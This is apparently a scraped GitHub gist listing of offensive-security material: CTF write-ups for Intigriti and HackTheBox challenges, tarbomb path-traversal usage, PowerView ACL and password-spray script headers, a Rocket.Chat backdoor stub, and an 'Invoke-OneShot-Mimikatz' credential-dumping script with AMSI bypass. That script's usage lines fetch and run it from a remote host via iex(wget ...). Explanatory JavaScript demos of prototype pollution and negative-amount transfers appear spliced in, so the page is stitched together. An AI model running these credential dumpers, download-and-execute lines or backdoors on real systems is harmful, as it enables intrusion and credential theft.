LongCat pich4ya

@pich4ya
pich4ya / intigrity_may22_xss_chall.txt
Last active Jun 5, 2022
Intigriti May '22 XSS Challenge - Prototype Pollution Writeup
@author Pichaya (LongCat) Morimoto (p.morimoto@sth.sh)
Challenge: https://challenge-0522.intigriti.io/challenge/challenge.html
The goal is to achieve XSS even though two protections are in place:
(1) User input is not reflected directly: the page only accepts an index (a number) and uses it to look up the HTML content to display.
(2) The looked-up HTML content (static, hard-coded) is then sanitized with filterXSS() from the xss-js library.
Tech Stack:
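As an added illustration of the bug class named in the title (this is not the writeup's code, and it is not js-xss), the block below shows how prototype pollution turns "index-only input plus a sanitizer" into XSS. The sanitizer is a toy stand-in that honours an options object; the assumption is that some option read off a polluted prototype changes its behaviour. The real gadget used in the challenge is not shown on this page. A vulnerable deep merge sits beside a hardened one, and the page table and payload are constructed.

```javascript
// Added example (not the writeup's or js-xss's code): prototype pollution
// reaching a sanitizer's options object. toySanitize stands in for a real
// sanitizer (assumption); PAGES and the payload are constructed.

// Static HTML fragments, looked up by index only.
const PAGES = [
  '<b>Welcome</b>',
  '<img src=x onerror="alert(1)">',
];

// Toy sanitizer: strips every tag unless opts.allowTags is truthy.
// Reading opts.allowTags walks the prototype chain, which is the gadget.
function toySanitize(html, opts = {}) {
  if (opts.allowTags) return html;
  return html.replace(/<[^>]*>/g, '');
}

// Vulnerable deep merge: iterates inherited keys and writes "__proto__",
// so target["__proto__"] resolves to Object.prototype and gets merged into.
function unsafeMerge(target, src) {
  for (const key in src) {
    const val = src[key];
    if (val !== null && typeof val === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened deep merge: own keys only, the three dangerous keys skipped, and
// new sub-objects created without a prototype so nothing is reachable through them.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, src) {
  for (const key of Object.keys(src)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = src[key];
    if (val !== null && typeof val === 'object') {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          target[key] === null || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// The challenge shape: the only user input is an index, and the looked-up
// HTML still goes through the sanitizer with a fresh, empty options object.
function render(index) {
  const idx = Number(index);
  const html = Number.isInteger(idx) && idx >= 0 && idx < PAGES.length ? PAGES[idx] : '';
  return toySanitize(html, {});
}

// Runs one attack: attacker-controlled JSON is merged into a settings object
// with the given merge, then the victim renders index 1. Object.prototype is
// cleaned afterwards so the demo stays repeatable.
function attack(merge) {
  const payload = JSON.parse('{"__proto__": {"allowTags": true}}');
  try {
    merge({}, payload);
    return render(1);
  } finally {
    delete Object.prototype.allowTags;
  }
}

console.log('unsafeMerge ->', attack(unsafeMerge)); // '<img src=x onerror="alert(1)">'
console.log('safeMerge   ->', attack(safeMerge));   // ''
```

The point to take from the demo: index validation and the sanitizer were both working; the sanitizer was simply asked a question (its options) whose answer the attacker had planted on Object.prototype. Checking `Object.prototype` for unexpected enumerable keys after a merge is a cheap regression test for any library that deep-merges user-controlled JSON.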
@pich4ya
pich4ya / install_medusa_macos.txt
Last active Jun 1, 2022
Medusa installation on MacOS 12.4
I got this error during `make` for Medusa installation on MacOS 12.4
```bash
git clone https://github.com/jmk-foofus/medusa
cd medusa
./configure
make && make install
[..]
medusa-net.c:349:28: error: implicit declaration of function 'TLS_client_method' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
sslContext = SSL_CTX_new(TLS_client_method());
```
@pich4ya
pich4ya / Spiky_Tamagotchy_Writeup.md
Last active Aug 6, 2022
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Spiky Tamagotchy Writeup

info

Captain Spiky comes from a rare species of creatures who can only breathe underwater. During the energy-crisis war, he was captured as a war prisoner and later forced to be a Tamagotchi pet for a child of a general of nomadic tribes. He is forced to react in specific ways and controlled remotely purely for the amusement of the general's children. The Paraman crew needs to save the captain of his misery as he is potentially a great asset for the war against Draeger. Can you hack into the Tamagotchi controller to rescue the captain?

techstack

  • node.js
  • express.js
  • mysql
  • alpine docker
@pich4ya
pich4ya / Genesis_Wallet_Writeup.txt
Created May 19, 2022
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Genesis Wallet Writeup
# author Pichaya Morimoto (p.morimoto@sth.sh)
Unintended solution.
Create two users, then transfer a negative amount (-9999) from one account to the other.
POST /api/transactions/create HTTP/1.1
[...]
Content-Length: 84
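As an added example (not the challenge's code), the block below is a minimal in-memory ledger that shows why a transfer of -9999 behaves as a free mint, beside the server-side validation that closes it. Account names and balances are constructed; nothing here reflects the challenge's real schema or endpoint.

```javascript
// Added example, not the challenge's code: negative-amount transfer as a mint.
// Ledger contents are constructed.

function makeLedger() {
  return new Map([['alice', 100], ['bob', 100]]);
}

// Vulnerable: coerces whatever the request body carried and only checks
// "balance < amount", which a negative amount passes trivially.
function transferUnchecked(ledger, from, to, amount) {
  const amt = Number(amount);
  if (ledger.get(from) < amt) throw new Error('insufficient funds');
  ledger.set(from, ledger.get(from) - amt);
  ledger.set(to, ledger.get(to) + amt);
  return { [from]: ledger.get(from), [to]: ledger.get(to) };
}

// Hardened: the amount must already be a number (no string coercion), a safe
// positive integer, the accounts must exist and differ, and funds must suffice.
function transferChecked(ledger, from, to, amount) {
  if (typeof amount !== 'number' || !Number.isSafeInteger(amount) || amount <= 0) {
    throw new Error('amount must be a positive integer');
  }
  if (from === to) throw new Error('cannot transfer to the same account');
  if (!ledger.has(from) || !ledger.has(to)) throw new Error('unknown account');
  if (ledger.get(from) < amount) throw new Error('insufficient funds');
  ledger.set(from, ledger.get(from) - amount);
  ledger.set(to, ledger.get(to) + amount);
  return { [from]: ledger.get(from), [to]: ledger.get(to) };
}

// Runs one transfer on a fresh ledger and reports whether it was refused.
function tryTransfer(fn, from, to, amount) {
  const ledger = makeLedger();
  try {
    return { refused: false, balances: fn(ledger, from, to, amount) };
  } catch (e) {
    return { refused: true, reason: e.message, balances: Object.fromEntries(ledger) };
  }
}

console.log(tryTransfer(transferUnchecked, 'alice', 'bob', -9999)); // alice: 10099, bob: -9899
console.log(tryTransfer(transferChecked, 'alice', 'bob', -9999));   // refused
```

In a real service the same rule belongs in the database as well (a CHECK constraint that amounts are positive and balances non-negative, inside one transaction), so that a second code path or a race cannot reintroduce the mint.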
@pich4ya
pich4ya / Acnologia_Portal_Writeup.txt
Last active Jun 1, 2022
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Acnologia Portal Writeup
# author Pichaya Morimoto (p.morimoto@sth.sh)
1. Register and Login
2. Submit Bug Report
Vulns:
- Tar extraction path traversal
- Tar content => overwrite a flask_session file (filesystem session type)
tarbomb.py
#!/bin/python
# python tarbomb.py `pwd`/__init__.py pwn.tar.gz 10 app/
# Copyright 2020 Andrew Scott
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE
@pich4ya
pich4ya / Find-AclSth.ps1
Created Apr 16, 2022
Modified version of PowerView's Find-InterestingDomainAcl (previously known as Invoke-ACLScanner). Requires PowerView.ps1
function Find-AclSth {
<#
.SYNOPSIS
Finds object ACLs in the current (or specified) domain with modification
rights set to non-built-in objects.
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
Author: Will Schroeder (@harmj0y)
Invoke-LocalUserSprayAttack.ps1
<#
Author: Itamar Mizrahi (@MrAnde7son)
License: GNU v3
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-LocalUserSprayAttack
{
<#
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active Aug 12, 2022
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@pich4ya
pich4ya / rocket_chat_backdoor.txt
Created Feb 11, 2022
Rocket.Chat Backdoor with an admin user role
@author Pichaya Morimoto (p.morimoto@sth.sh)
Tested on Rocket.Chat 3.16.1
As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat
"Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered."
However, no exact instruction was given. Here we go.
PoC: